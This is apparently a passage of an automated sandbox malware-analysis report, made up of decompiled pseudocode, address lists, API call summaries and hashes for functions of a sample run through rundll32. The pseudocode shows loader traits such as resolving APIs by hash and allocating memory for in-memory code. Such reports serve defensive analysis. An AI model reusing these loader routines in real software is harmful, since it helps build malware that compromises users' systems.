                  				_t52 = r9d;
                  				_t26 =  <  ? r9d : 0x1000;
                  				_t103 = __r8;
                  				 *((intOrPtr*)(_t99 + 0x20)) =  <  ? r9d : 0x1000;
                  				E0000000118000459C(0xdc630174, __rax,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t68 == 0) goto 0x8000381d;
                  				asm("sbb ecx, ecx");
                  				_t72 =  ~__rdx;
                  				asm("inc ebp");
                  				 *(_t93 + 0x30) =  *(_t93 + 0x30) & 0x00000000;
                  				 *((intOrPtr*)(_t93 + 0x28)) = _t52;
                  				 *(_t93 + 0x20) = _t45 &  *(_t93 + 0x88);
                  				 *_t68(_t108, _t105, _t102, _t85, _t87); // executed
                  				goto 0x8000381f;
                  				if (0 != 0) goto 0x80003890;
                  				if (GetLastError() != 0x2f8f) goto 0x80003876;
                  				 *((intOrPtr*)(_t93 + 0x70)) = 0x3300;
                  				if (0 != 0) goto 0x800038dc;
                  				E0000000118000459C(0xe7f09937, _t72,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t72 == 0) goto 0x80003869;
                  				_t14 = _t87 + 4; // 0x4
                  				r9d = _t14;
                  				 *_t72();
                  				goto 0x8000386b;
                  				if (0 == 0) goto 0x80003884;
                  				goto 0x8000387d;
                  				if (0 != 0x2f00) goto 0x8000388c;
                  				goto 0x800037d2;
                  				if (GetLastError() != 0) goto 0x800038dc;
                  				_t65 = _t103;
                  				if (_t65 == 0) goto 0x800038dc;
                  				if (_t65 == 0) goto 0x800038dc;
                  				E0000000118000459C(0xcb679d89, _t72,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t72 == 0) goto 0x800038ce;
                  				r8d = _t52 -  *(_t93 + 0x88);
                  				 *_t72();
                  				goto 0x800038d0;
                  				if (0 != 0) goto 0x800038dc;
                  				return GetLastError();
                  			}


















                  0x180003798
                  0x180003798
                  0x180003798
                  0x18000379b
                  0x18000379f
                  0x1800037ab
                  0x1800037be
                  0x1800037c1
                  0x1800037c5
                  0x1800037cb
                  0x1800037db
                  0x1800037e6
                  0x1800037f7
                  0x180003800
                  0x180003803
                  0x180003806
                  0x18000380c
                  0x180003810
                  0x180003818
                  0x18000381b
                  0x180003821
                  0x180003830
                  0x180003832
                  0x18000383c
                  0x18000384b
                  0x180003853
                  0x180003859
                  0x180003859
                  0x180003865
                  0x180003867
                  0x18000386d
                  0x180003874
                  0x18000387b
                  0x18000387f
                  0x18000388e
                  0x180003890
                  0x180003893
                  0x18000389c
                  0x1800038a7
                  0x1800038af
                  0x1800038c7
                  0x1800038ca
                  0x1800038cc
                  0x1800038d2
                  0x1800038f6

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorLast
                  • String ID:
                  • API String ID: 1452528299-0
                  • Opcode ID: f2c420c76b630dbde9be635b1a0a2799e127628071e741fee86cfc76d2d98ae6
                  • Instruction ID: 751b5ccbb4ed30b18e4ca4c9a719b417d78c129dcd65879b60b3e8381e7608ce
                  • Opcode Fuzzy Hash: f2c420c76b630dbde9be635b1a0a2799e127628071e741fee86cfc76d2d98ae6
                  • Instruction Fuzzy Hash: 1C416E327047498AEBE3DB669841BEA73A8AB8C7D4F14C525FE4983785DE34CA4D8700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 67%
                  			E00000001180006DCC(long long __rbx, intOrPtr* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi) {
                  				int _t27;
                  				void* _t46;
                  				long long _t48;
                  				intOrPtr* _t63;
                  				long long _t65;
                  				intOrPtr* _t66;
                  				void* _t68;
                  				void* _t69;
                  				void* _t71;
                  				void* _t74;
                  				WCHAR* _t77;
                  				WCHAR* _t80;
                  
                  				_t48 = __rbx;
                  				_t46 = _t68;
                  				 *((long long*)(_t46 + 8)) = __rbx;
                  				 *((long long*)(_t46 + 0x10)) = _t65;
                  				 *((long long*)(_t46 + 0x18)) = __rsi;
                  				 *((long long*)(_t46 + 0x20)) = __rdi;
                  				_t69 = _t68 - 0x30;
                  				_t63 = __rcx;
                  				_t66 = __rdx;
                  				E000000011800089E4(__rbx,  *0x8000d490 + 0x180011220, __rdx, __rdi, __rcx, _t71);
                  				if ( *0x8000d4a0 == _t48) goto 0x80006e8a;
                  				 *_t66 =  *_t63;
                  				if (lstrlenW(_t80) - 0xe <= 0) goto 0x80006e4f;
                  				_t27 = lstrcmpiW(_t77); // executed
                  				if (_t27 == 0) goto 0x80006e7a;
                  				E00000001180002594(_t26, _t48,  *0x8000d4a0, _t63, _t69 + 0x20, _t74);
                  				r11d =  *((intOrPtr*)(_t69 + 0x20));
                  				 *_t66 =  *_t66 +  *((intOrPtr*)(_t69 + 0x24)) + r11d;
                  				 *((intOrPtr*)(_t66 + 4)) =  *((intOrPtr*)(_t66 + 4)) +  *((intOrPtr*)(_t69 + 0x28)) +  *((intOrPtr*)(_t69 + 0x2c));
                  				HeapFree(??, ??, ??);
                  				goto 0x80006e8f;
                  				return 8;
                  			}















                  0x180006dcc
                  0x180006dcc
                  0x180006dcf
                  0x180006dd3
                  0x180006dd7
                  0x180006ddb
                  0x180006de5
                  0x180006df7
                  0x180006dfe
                  0x180006e12
                  0x180006e1f
                  0x180006e24
                  0x180006e36
                  0x180006e45
                  0x180006e4d
                  0x180006e59
                  0x180006e5e
                  0x180006e6e
                  0x180006e77
                  0x180006e82
                  0x180006e88
                  0x180006eaf

                  APIs
                    • Part of subcall function 00000001800089E4: HeapAlloc.KERNEL32(?,?,?,0000000180006E17,?,?,?,?,00000000,00000001800052B1), ref: 0000000180008A5D
                  • lstrlenW.KERNEL32(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E2B
                  • lstrcmpiW.KERNELBASE(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E45
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E82
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$AllocFreelstrcmpilstrlen
                  • String ID:
                  • API String ID: 727816722-0
                  • Opcode ID: a22ed0a1ed0f0616c918df9911004096ede51290a7a9af073c19c02c22aa0494
                  • Instruction ID: d0415e672ad6f4a9c89e0efb1880c6926a1671767ff9eca089c1e6ebc0bc87c8
                  • Opcode Fuzzy Hash: a22ed0a1ed0f0616c918df9911004096ede51290a7a9af073c19c02c22aa0494
                  • Instruction Fuzzy Hash: 7B216D36600B8896D751DB16E84039AB3A1F78CBD8F48C122FE4D83758DF38CA4ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 33%
                  			E00000001180006D04(long long __rbx, void* __rcx, long long __rsi, long long __r9) {
                  				intOrPtr _t30;
                  				intOrPtr _t35;
                  				long long* _t40;
                  				int _t49;
                  				long long _t53;
                  				long long* _t56;
                  				void* _t57;
                  				long long _t59;
                  				void* _t61;
                  				void* _t64;
                  
                  				_t59 = __r9;
                  				_t40 = _t56;
                  				 *((long long*)(_t40 + 8)) = __rbx;
                  				 *((long long*)(_t40 + 0x10)) = _t53;
                  				 *((long long*)(_t40 + 0x18)) = __rsi;
                  				_t57 = _t56 - 0x50;
                  				_t4 = _t49 + 0x10; // 0x10
                  				_t35 = _t4;
                  				 *((char*)(_t40 - 0x38)) = 8;
                  				_t30 =  <  ? r8d : _t35;
                  				 *((char*)(_t40 - 0x37)) = 2;
                  				 *((intOrPtr*)(_t40 - 0x34)) = 0x660e;
                  				r8d = _t30;
                  				 *((short*)(_t40 - 0x36)) = 0;
                  				 *((intOrPtr*)(_t40 - 0x30)) = _t35;
                  				memcpy(_t64, _t61, _t49);
                  				r11d = _t35;
                  				r11d = r11d - _t30;
                  				if (r8d == _t35) goto 0x80006d73;
                  				r8d = r11d;
                  				memset(??, ??, ??);
                  				E0000000118000459C(0x9ae4c678, _t40,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t40 == _t49) goto 0x80006da2;
                  				r9d = 0;
                  				_t15 = _t59 + 0x1c; // 0x1c
                  				r8d = _t15;
                  				 *((long long*)(_t57 + 0x28)) = __r9;
                  				 *((intOrPtr*)(_t57 + 0x20)) = 0;
                  				 *_t40(); // executed
                  				goto 0x80006da4;
                  				if (0 != 0) goto 0x80006db0;
                  				return GetLastError();
                  			}













                  0x180006d04
                  0x180006d04
                  0x180006d07
                  0x180006d0b
                  0x180006d0f
                  0x180006d18
                  0x180006d28
                  0x180006d28
                  0x180006d37
                  0x180006d3b
                  0x180006d3f
                  0x180006d43
                  0x180006d4a
                  0x180006d4d
                  0x180006d51
                  0x180006d54
                  0x180006d59
                  0x180006d5c
                  0x180006d5f
                  0x180006d64
                  0x180006d6e
                  0x180006d7c
                  0x180006d84
                  0x180006d86
                  0x180006d91
                  0x180006d91
                  0x180006d95
                  0x180006d9a
                  0x180006d9e
                  0x180006da0
                  0x180006da6
                  0x180006dcb

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorLastmemcpymemset
                  • String ID:
                  • API String ID: 954129129-0
                  • Opcode ID: 95295f05be87c7c3f4886005b4998b098cb939ad94dc0b7d7ecc8385bb3953ea
                  • Instruction ID: b24fa6da6f7637d02e6406ae7bebfb633d62473b8d0dea1419b0e5df7442ba24
                  • Opcode Fuzzy Hash: 95295f05be87c7c3f4886005b4998b098cb939ad94dc0b7d7ecc8385bb3953ea
                  • Instruction Fuzzy Hash: FA21DE3772065486E7A2CB26D844B8E76A1F3CCBC0F198112EE5813B10CF74CA49CB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.765086597.000001C716160000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C716160000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_1c716160000_rundll32.jbxd
                  Similarity
                  • API ID:
                  • String ID: R
                  • API String ID: 0-1466425173
                  • Opcode ID: f6db66518de9870f800278d0e751a791126f3dfc3022282491ac7af2e4f2bea1
                  • Instruction ID: 49ed8b641a12185792c5d279536283b7030c42c9ce900dafc3580a1a79d81520
                  • Opcode Fuzzy Hash: f6db66518de9870f800278d0e751a791126f3dfc3022282491ac7af2e4f2bea1
                  • Instruction Fuzzy Hash: 848146391DDE548FF6A4DB28C454FE976E2FB943A0F9C9458A08AC32D1C6E1DC45AF02
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 28%
                  			E00007FFE7FFE35481812(void* __eax, void* __edi, void* __esi, void* __esp, long long _a32, short _a62, short _a64, short _a66, short _a68, short _a70, short _a72, short _a74, short _a76, short _a78, short _a80, void* _a96, void* _a128, void* _a180, long long _a208) {
                  				short _t21;
                  				void* _t41;
                  
                  				_t21 = __eax + 0x5c;
                  				_a66 = _t21;
                  				goto 0x3548185c;
                  				_a72 = _t21;
                  				_a62 = 0x65;
                  				goto 0x3548183c;
                  				_a70 = 0x9b;
                  				goto 0x35481872;
                  				goto 0x35481846;
                  				_a64 = 0x38;
                  				goto E00007FFE7FFE35481812;
                  				_a74 = 0x45;
                  				goto 0x354818b5;
                  				goto 0x35481866;
                  				_a68 = 0x6f;
                  				goto 0x35481832;
                  				goto 0x3548181c;
                  				goto 0x354818a9;
                  				_a80 = 0;
                  				goto 0x3548187c;
                  				_a78 = 0x21;
                  				goto 0x35481889; // executed
                  				VirtualAlloc(??, ??, ??, ??); // executed
                  				_a32 = _a208;
                  				goto 0x354818da;
                  				r9d = 0x32;
                  				r9d = r9d + 0xe;
                  				goto 0x354818cb;
                  				goto 0x354818bf;
                  				_a76 = 0x74;
                  				goto 0x35481892;
                  				r8d = 0xf55;
                  				r8d = r8d + 0xab;
                  				goto 0x354818e8;
                  				r8d =  *((intOrPtr*)(_a208 + 8));
                  				goto 0x35481931;
                  				goto 0x3548189c;
                  				goto 0x35481924;
                  				_t41 = memcpy(__edi, __esi, 0);
                  				goto 0x354818ee;
                  				goto 0x354818fd;
                  				goto 0x35481908;
                  				return _t41;
                  			}





                  0x7ffe35481812
                  0x7ffe35481815
                  0x7ffe3548181a
                  0x7ffe3548181c
                  0x7ffe3548182b
                  0x7ffe35481830
                  0x7ffe35481835
                  0x7ffe3548183a
                  0x7ffe35481844
                  0x7ffe35481846
                  0x7ffe35481850
                  0x7ffe35481855
                  0x7ffe3548185a
                  0x7ffe35481864
                  0x7ffe35481866
                  0x7ffe35481870
                  0x7ffe3548187a
                  0x7ffe35481887
                  0x7ffe3548188b
                  0x7ffe35481890
                  0x7ffe35481895
                  0x7ffe3548189a
                  0x7ffe3548189c
                  0x7ffe354818a2
                  0x7ffe354818a7
                  0x7ffe354818a9
                  0x7ffe354818af
                  0x7ffe354818b3
                  0x7ffe354818bd
                  0x7ffe354818bf
                  0x7ffe354818c9
                  0x7ffe354818cb
                  0x7ffe354818d1
                  0x7ffe354818d8
                  0x7ffe354818e2
                  0x7ffe354818e6
                  0x7ffe354818ec
                  0x7ffe354818fb
                  0x7ffe354818fd
                  0x7ffe35481906
                  0x7ffe35481910
                  0x7ffe3548191d
                  0x7ffe3548191f

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.765331866.00007FFE35481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFE35480000, based on PE: true
                  • Associated: 00000004.00000002.765324849.00007FFE35480000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000004.00000002.765340158.00007FFE35482000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000004.00000002.765346850.00007FFE35483000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000004.00000002.765488940.00007FFE35505000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffe35480000_rundll32.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID: ~
                  • API String ID: 4275171209-1707062198
                  • Opcode ID: 23c9a529b91b64a43622319348fc625be395018795599c90a3d137ab767d5f4f
                  • Instruction ID: ca8365100222f8a855a59a91800f236ba35f7429f6d9e0b3eb3a4a8416791715
                  • Opcode Fuzzy Hash: 23c9a529b91b64a43622319348fc625be395018795599c90a3d137ab767d5f4f
                  • Instruction Fuzzy Hash: 8041EC76E0C6C3C2E2388B45E40937D6A21EB91F40F626037D69F47BA4DE2EE505B701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorLast$CreateThread
                  • String ID:
                  • API String ID: 665435222-0
                  • Opcode ID: 33611ef75179cc0a7cf688456195da8b73a4d3b065f91bba2ce119b7dda03dec
                  • Instruction ID: a627022cb49e9541912d6ea488725a36f99cb9846cfda91d0a227d10bba4b38c
                  • Opcode Fuzzy Hash: 33611ef75179cc0a7cf688456195da8b73a4d3b065f91bba2ce119b7dda03dec
                  • Instruction Fuzzy Hash: 02017C31204748C7E7A1CF62A84039A7360F38CBE4F148625AB9D43B94CF38D6698704
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.765331866.00007FFE35481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFE35480000, based on PE: true
                  • Associated: 00000004.00000002.765324849.00007FFE35480000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000004.00000002.765340158.00007FFE35482000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000004.00000002.765346850.00007FFE35483000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000004.00000002.765488940.00007FFE35505000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffe35480000_rundll32.jbxd
                  Similarity
                  • API ID: ConsoleRead$Output
                  • String ID:
                  • API String ID: 998487036-0
                  • Opcode ID: c3a25d08347ce4988534e0ec1b19da2b181a03e4656b16271a26a59e5cd27ae5
                  • Instruction ID: c987be35f19e21a184c81e885f5410d48f5c8bd307c252436ad5ca497bcf69ac
                  • Opcode Fuzzy Hash: c3a25d08347ce4988534e0ec1b19da2b181a03e4656b16271a26a59e5cd27ae5
                  • Instruction Fuzzy Hash: DFF0F431E1C7C3C5E6BC8B11944867E6A61BB85F84F615036D98F92BA8DE1EF404BB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ObjectSingleSleepWait
                  • String ID:
                  • API String ID: 309074506-0
                  • Opcode ID: 76b9bff6f2f2c4897aeed711b389028ad91ff366cb314fc98fdffdba1b370fa5
                  • Instruction ID: 868bbf46d8f10ff22f1b5017158e4687c10dd0102503e43f41494b1e161a0d2d
                  • Opcode Fuzzy Hash: 76b9bff6f2f2c4897aeed711b389028ad91ff366cb314fc98fdffdba1b370fa5
                  • Instruction Fuzzy Hash: 6BD05B3470360442FD9ED711985036532205F8CBD9F54C614A52B472D0CE29969E4700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.765086597.000001C716160000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C716160000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_1c716160000_rundll32.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: 831dfab93be32fb9158138a06fce796c917578cf2630128af9e648984fbb3730
                  • Instruction ID: c2a3b9d9c638d3788557511484fb369ec7c2f48c66af191bee091bdd92c006fa
                  • Opcode Fuzzy Hash: 831dfab93be32fb9158138a06fce796c917578cf2630128af9e648984fbb3730
                  • Instruction Fuzzy Hash: EB510E3859CA549FF6A4DB188054BEA76E1FB843A4F98291DA086C32E0D7F4C841BF02
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000004.00000002.765086597.000001C716160000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C716160000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_1c716160000_rundll32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4380eabb031132f8da1989044d9d06e0edfe3364dd2beaa1806a0aeff124192b
                  • Instruction ID: ef1dfdee95a0e627c92e09ab980c9c0c67d73980581eb024b0230038516ec59a
                  • Opcode Fuzzy Hash: 4380eabb031132f8da1989044d9d06e0edfe3364dd2beaa1806a0aeff124192b
                  • Instruction Fuzzy Hash: E6511F3959CE488FF6A4DB1C805AFED76E1FB843A2F9C4519A447C32D1D6E4D840AF42
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 37%
                  			E00000001180008D78(void* __eflags, long long __rbx, intOrPtr* __rcx, long long __rdx) {
                  				void* _t77;
                  				void* _t88;
                  				intOrPtr _t91;
                  				void* _t96;
                  				char _t97;
                  				void* _t115;
                  				long long* _t157;
                  				void* _t158;
                  				long long _t160;
                  				char* _t162;
                  				long long _t163;
                  				char* _t178;
                  				char* _t179;
                  				void* _t203;
                  				long long _t204;
                  				void* _t208;
                  				intOrPtr* _t209;
                  				int _t211;
                  				void* _t215;
                  				void* _t216;
                  				void* _t235;
                  				long _t238;
                  				long _t244;
                  				void* _t246;
                  				CHAR* _t253;
                  				long long _t254;
                  
                  				_t235 = _t215;
                  				 *((long long*)(_t235 + 8)) = __rbx;
                  				 *((long long*)(_t235 + 0x10)) = __rdx;
                  				_t216 = _t215 - 0x40;
                  				r13d =  *0x8000d498;
                  				_t209 = __rcx;
                  				 *((long long*)(_t216 + 0x38)) =  *((intOrPtr*)( *0x8000d4a0 + 8));
                  				if (E00000001180002370(r13d ^ 0x55e7ce26,  *((intOrPtr*)( *0x8000d4a0 + 8)), __rdx, _t235) != 0) goto 0x800090ee;
                  				_t204 =  *((intOrPtr*)( *0x8000d4a0 + 8));
                  				_t157 =  *_t209;
                  				 *((long long*)(_t216 + 0x98)) = _t157;
                  				 *((long long*)(_t216 + 0x28)) = _t204;
                  				if ( *((intOrPtr*)(_t216 + 0x20)) == 0) goto 0x80008f65;
                  				r8d = lstrlenA(_t253) + 1;
                  				HeapAlloc(_t246, _t244, _t238);
                  				_t254 = _t157;
                  				if (_t157 == 0) goto 0x800090e4;
                  				memcpy(_t203, _t208, _t211);
                  				_t162 = _t254;
                  				if ( *_t162 == 0x20) goto 0x80008e46;
                  				if ( *_t162 != 9) goto 0x80008e4b;
                  				_t163 = _t162 + 1;
                  				goto 0x80008e3c;
                  				if ( *_t163 == 0) goto 0x80008ecc;
                  				lstrlenA(??);
                  				asm("cdq");
                  				_t12 = _t157 + 1; // 0x1
                  				r8d = _t12;
                  				HeapAlloc(??, ??, ??);
                  				if (_t157 == 0) goto 0x80008ece;
                  				_t96 =  *_t163;
                  				if (_t96 == 0) goto 0x80008e99;
                  				if (_t96 == 0x20) goto 0x80008e95;
                  				_t178 = _t163 + 1;
                  				_t97 =  *_t178;
                  				if (_t97 != 0) goto 0x80008e87;
                  				if (_t97 != 0) goto 0x80008e9b;
                  				if (_t178 == 0) goto 0x80008eb5;
                  				 *_t178 = 0;
                  				_t179 = _t178 + 1;
                  				if ( *_t179 == 0x20) goto 0x80008eb0;
                  				if ( *_t179 != 9) goto 0x80008eb5;
                  				goto 0x80008ea6;
                  				 *_t157 = _t163;
                  				_t158 = _t157 + _t204;
                  				if (_t179 + 1 != 0) goto 0x80008e7e;
                  				goto 0x80008ed6;
                  				if (0 == 0) goto 0x80008f4f;
                  				E0000000118000958C( *((intOrPtr*)(_t216 + 0x98)) + 0x18);
                  				 *((long long*)(_t209 + 0x40)) = _t254;
                  				 *((long long*)(_t209 + 0x48)) =  *((intOrPtr*)(_t216 + 0x90));
                  				 *((intOrPtr*)(_t209 + 0x50)) = bpl;
                  				if ( *((char*)(_t209 + 0x70)) == 0) goto 0x80008f09;
                  				 *((char*)(_t209 + 0x70)) = 0;
                  				asm("lock and dword [esi+0x2c], 0xfffffffe");
                  				LeaveCriticalSection(??);
                  				if ( *((intOrPtr*)(_t209 + 0x40)) == 0) goto 0x80008f3e;
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80008f6a;
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				if (0x57 != 0) goto 0x800090f3;
                  				if (E00000001180002370(r13d ^ 0x881e33f6, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x800090ee;
                  				_t77 = E000000011800038F8( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)), _t216 + 0x98);
                  				_t91 =  *((intOrPtr*)(_t216 + 0x98));
                  				if (_t77 != 0) goto 0x80008fd2;
                  				if (_t91 == 0) goto 0x800090ee;
                  				 *((intOrPtr*)(_t209 + 0x28)) = _t91;
                  				if (E00000001180002370(r13d ^ 0xa2dd2342, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x8000905e;
                  				_t39 = _t158 + 0x10; // 0x10
                  				_t88 = _t39;
                  				_t115 =  <  ?  *((void*)(_t216 + 0x90)) : _t88;
                  				E0000000118000958C( *_t209 + 0x18);
                  				r8d = _t115;
                  				memcpy(??, ??, ??);
                  				if (_t115 - _t88 >= 0) goto 0x80009043;
                  				r8d = _t88 - _t115;
                  				memset(??, ??, ??);
                  				LeaveCriticalSection(??);
                  				HeapFree(??, ??, ??);
                  				r13d = r13d ^ 0x1a1a0866;
                  				if (E00000001180002370(r13d, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x800090f3;
                  				if (E000000011800038F8( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)), _t216 + 0x98) == 0) goto 0x800090f3;
                  				if ( *((intOrPtr*)(_t216 + 0x98)) == 0) goto 0x800090f3;
                  				_t55 =  *_t209 + 0x18; // 0x28
                  				E0000000118000958C(_t55);
                  				GetSystemTimeAsFileTime(??);
                  				_t160 =  *((intOrPtr*)(_t216 + 0x30)) + ( *((intOrPtr*)( *0x8000d4a0 + 8)) +  *((intOrPtr*)( *0x8000d4a0 + 8))) * 0x23c34600;
                  				 *((long long*)(_t216 + 0x30)) = _t160;
                  				 *((long long*)(_t209 + 0x30)) = _t160;
                  				LeaveCriticalSection(??);
                  				goto 0x800090f3;
                  				goto 0x80008f6a;
                  				return 1;
                  			}





























                  0x180008d78
                  0x180008d7b
                  0x180008d7f
                  0x180008d8e
                  0x180008d99
                  0x180008daa
                  0x180008dbe
                  0x180008dca
                  0x180008ddc
                  0x180008de0
                  0x180008de3
                  0x180008deb
                  0x180008df3
                  0x180008e09
                  0x180008e0e
                  0x180008e14
                  0x180008e1a
                  0x180008e29
                  0x180008e35
                  0x180008e3f
                  0x180008e44
                  0x180008e46
                  0x180008e49
                  0x180008e4e
                  0x180008e53
                  0x180008e5c
                  0x180008e63
                  0x180008e63
                  0x180008e6b
                  0x180008e79
                  0x180008e7e
                  0x180008e85
                  0x180008e8a
                  0x180008e8c
                  0x180008e8f
                  0x180008e93
                  0x180008e97
                  0x180008e9e
                  0x180008ea0
                  0x180008ea3
                  0x180008ea9
                  0x180008eae
                  0x180008eb3
                  0x180008eb5
                  0x180008eba
                  0x180008ec3
                  0x180008eca
                  0x180008ed8
                  0x180008ee6
                  0x180008ef3
                  0x180008ef7
                  0x180008efb
                  0x180008f03
                  0x180008f05
                  0x180008f09
                  0x180008f12
                  0x180008f1b
                  0x180008f2a
                  0x180008f38
                  0x180008f4d
                  0x180008f57
                  0x180008f77
                  0x180008f7f
                  0x180008fa5
                  0x180008fba
                  0x180008fbf
                  0x180008fc8
                  0x180008fcc
                  0x180008fd5
                  0x180008ff5
                  0x180008ffa
                  0x180008ffa
                  0x18000900b
                  0x180009013
                  0x180009021
                  0x180009026
                  0x18000902d
                  0x18000903b
                  0x18000903e
                  0x180009048
                  0x180009058
                  0x18000905e
                  0x180009081
                  0x180009099
                  0x1800090a4
                  0x1800090a9
                  0x1800090ad
                  0x1800090b7
                  0x1800090cc
                  0x1800090d3
                  0x1800090d8
                  0x1800090dc
                  0x1800090e2
                  0x1800090e9
                  0x18000910c

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Free$CriticalLeaveSection$AllocTimelstrlenmemcpy$FileSystemmemset
                  • String ID:
                  • API String ID: 3273538229-0
                  • Opcode ID: fe13ca55ced21057dd33dceaeca19e1809f43a7503c78fa45138f0264a1560c7
